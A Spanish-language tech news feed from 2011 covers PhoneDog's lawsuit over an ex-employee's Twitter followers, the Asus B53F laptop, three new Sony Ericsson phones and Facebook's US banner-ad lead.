La compañía Phonedog ha demandado a un exempleado por quedarse con los 17.000 seguidores de Twitter que tenía cuando trabajaba en la empresa. La compañía reclama 1,9 euros al mes por cada seguidor durante ocho meses, por lo que la cifra asciende a 260.000 euros.

Un nuevo caso de propiedad intelectual afecta a los social media. En este caso a Twitter. En octubre de 2010, el escritor Noah Kravitz dejó su trabajo en el popular portal de telefonía móvil,
tras casi cuatro años. El empleado, de 38 años, había comenzado a
escribir en Twitter bajo el nombre de Phonedog_Noah, y con el tiempo,
logró acumular 17.000 seguidores.

Cuando Kravitz dejó su trabajo, PhoneDog le confirmó que podía
mantener esa cuenta de Twitter a cambio de publicar de vez en cuando en
ella.

"La compañía me pidió 'tuitear' de vez en cuando con mi nombre y yo
dije que por supuesto. Quería acabar las cosas bien", asegura Kravitz,
según recoge el diario The New York Times. Desde ese momento empezó a escribir como NoahKravitz, manteniendo los 17.000 seguidores.

Sin embargo, ocho meses después de que Noah dejara la compañía, PhoneDog le demandó, afirmando que se había apropiado de la lista de Twitter de la compañía, considerada como una lista de clientes, y pide a Kravitz el pago de 1,9 euros al mes por cada seguidor durante ocho meses, sumando un total de más de 260.000 euros.

PhoneDog Media ha asegurado que los costes y los recursos invertidos por PhoneDog Media para el crecimiento de sus seguidores, fans y conocimiento de la marca en general a través de los medios sociales son importantes, y se consideran propiedad de PhoneDog Media. "Tenemos la intención de proteger agresivamente nuestra lista de clientes e información confidencial, propiedad intelectual y marca"

Kravitz aseguró que la demanda, presentada ante la Corte Federal de
Distrito en California, fue en represalia por su afirmación de que el
15% de los ingresos brutos de publicidad del sitio habían sido gracias a
él, además de su cuenta de Twitter, como revisor de vídeos y bloguero de la página.

Via: 20minutos

Nuevo portátil para profesionales Asus B53F

wf-zone — Thu, 23 Jun 2011 04:17:43 GMT

Si usted es de los profesionales que anda buscando un portátil versátil, déjenme decirles que Asus les tiene una muy buena opción, el Asus B53F. Este es un portátil de 15.6 pulgadas que viene desarrollado bajo la segunda generación de procesadores Intel Core.

Basado en Windows 7 Professional, el B53F también está equipado con una tarjeta gráfica Intel GMA de alta definición.

Otras
de sus características incluyen: memoria DDR3 de hasta 8 GB, disco
duro de 320 GB, unidad óptica grabadora de DVD, puerto Ethernet,
conectividad Wi-Fi, webcam para videoconferencias, lector de tarjetas
de memoria y lector de huellas digitales.

También
cuenta con puerto e-SATA, dos puertos USB 2.0, D-Sub y DisplayPort.
Además, cuenta con una batería de larga duración Sonata, que tiene una
garantía de tres años.

Via: Tecnologia Clehider

Sony Ericsson presenta tres nuevos teléfonos

wf-zone — Wed, 22 Jun 2011 22:34:10 GMT

Sony Ericsson acaba de presentar tres nuevos teléfonos, dos de los cuales forman parte de la familia Xperia.

El primero de ellos es el Sony Ericsson Xperia Ray, un Smartphone moderno
y delgado (9.4 mm) que corre bajo Android 2.3 Gingerbread y que viene
con una pantalla de 3.3 pulgadas resistente a ralladuras (FWVGA). Ray
también cuenta con Facebook, HSDPA, Wi-Fi, GPS, cámara de 8.1 MP (óptica Exmor R), grabación de video HD, procesador de 1 GHz y una tarjeta de memoria de 4 GB preinstalada.

El Xperia Ray estará disponible en
mercados seleccionados (incluyendo a Japón) a partir del tercer
trimestre del año. A continuación puedes ver un video promocional del
mismo:

A continuación tenemos el Sony Ericsson Xperia Active
(que debe ser liberado en el mismo tiempo del Ray). Como su mismo nombre
lo indica, este es un teléfono inteligente destinado a los usuarios
¨con un estilo de vida activo¨.

A continuación tenemos el Sony Ericsson Xperia Active
(que debe ser liberado en el mismo tiempo del Ray). Como su mismo
nombre lo indica, este es un teléfono inteligente destinado a los
usuarios ¨con un estilo de vida activo¨.

Corriendo también con Android Gingerbread, el Active es resistente
al agua y al polvo. El teléfono viene con una pantalla HVGA de 3
pulgadas, Wi-Fi, HSDPA, GPS, barómetro, brújula, correa para la muñeca, Facebook,
cámara de 5 megapíxeles con grabación de video HD, procesador de 1 GHz,
y una tarjeta de memoria de 2 GB pre-instalada. En la pantalla muestra
la frecuencia cardiaca y la información del pulso.

Por último, figura el Sony Ericsson TXT:

Este es un candybar al estilo BlackBerry, y cuenta con una pantalla QVGA
y un teclado QWERTY completo. Otras de sus características incluyen:
Wi-Fi, tecla de acceso directo SMS, acceso a Facebook
y Twitter, cámara de 3.2 MP, y ranura para tarjetas microSD. El
teléfono debe estar disponible hacia el tercer trimestre del año.

Via: Actualidad Gadgets

Visto En: Tecnologia

Facebook, campeón de tiras publicitarias en Estados Unidos

wf-zone — Wed, 22 Jun 2011 15:09:55 GMT

La red social Facebook se está convirtiendo este
año en campeón de tiras publicitarias (banners) en Estados Unidos,
relegando a Yahoo! al segundo lugar, seguido de cerca por Google, según
un estudio publicado por la consultora eMarketer.

EMarketer estima que en 2011 Facebook va a
ganar 2.190 millones de dólares vendiendo espacios publicitarios en
Estados Unidos, cerca de 1.000 millones más que hace un año, enviando
así a Yahoo! a un segundo puesto (1.620 millones de dólares).

Se prevé que en 2012 los ingresos
provenientes de los anuncios publicitarios (incluyendo video) en Estados
Unidos reporten 2.870 millones de dólares a Facebook, 1.850 millones de
dólares a Yahoo! y 1.820 millones de dólares a Google.

"Con una tasa de crecimiento anual prevista
de 13,6% para 2011, la actividad de las tiras publicitarias de Yahoo!
crece normalmente -es lo que constatamos a primera vista. Pero al ver
que se prevé un crecimiento anual de ese mercado de 24,5% para 2011,
impulsado por el importante crecimiento de Facebook y Google, el
crecimiento de Yahoo! parece más mediocre que bueno", comentó David
Hallerman, analista de eMarketer citado en un comunicado.

En lo que concierne a Facebook, cuyas tiras
publicitarias aparecen generalmente en la columna derecha de la pantalla
del internauta, su formato personalizado entusiasma a los anunciantes.
"Se trata de empresas bastante pequeñas, que dan mucha importancia a las
publicidades de respuestas directas", invitando al internauta a
seleccionar o pinchar, indicó Hallerman.

Google, que domina ampliamente el mercado
publicitario relacionado a la búsqueda por internet (75,9% de cuota de
mercado este año, según eMarketer), quiere asegurarse de estar presente
también en el de banners. El pasado lunes anunció la compra de Admels,
empresa especializada en la gestión de espacios publicitarios.

Via: Kioskea